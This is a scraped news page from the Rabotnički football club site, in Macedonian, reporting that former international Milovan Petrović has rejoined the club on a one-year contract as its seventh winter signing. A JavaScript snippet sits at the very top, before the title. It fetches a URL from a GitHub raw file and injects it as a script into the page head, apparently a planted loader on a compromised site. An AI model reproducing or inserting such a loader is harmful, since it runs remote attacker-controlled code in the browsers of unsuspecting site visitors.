;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Милован Петровиќ се врати во својот дом
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Милован Петровиќ се врати во својот дом

Поранешниот македонски репрезентативец Милован Петровиќ е најновото засилување на Работнички за пролетниот дел од шампионатот во Првата македонска фудбалска лига.

28-годишниот Петровиќ, всушност повторно се враќа во редовите на „романтичарите“ каде настапуваше од 2010 до 2016 година, сега потпишувајќи едногодишен договор до јануари 2020 година.

Петровиќ во нашиот клуб се враќа по двегодишни настапи за хрватскиот прволигаш Осијек. Претходно, во својата кариера, има настапи и за кавадаречки Тиквеш и прилепска Победа. Има девет настапи за младата репрезентација и шест официјални настапи за сениорската селекција на Македонија.

Петровиќ е седмото засилување за Работнички во овој преоден рок. Претходно клубот се засили и со бразилскиот интернационалец Асуерио Барбоса де Соуса Јуниор, како и Баже Илијоски, Дејан Блажевски, Николај Дилгеров, Емил Вијачки и Жунињо Кабрал.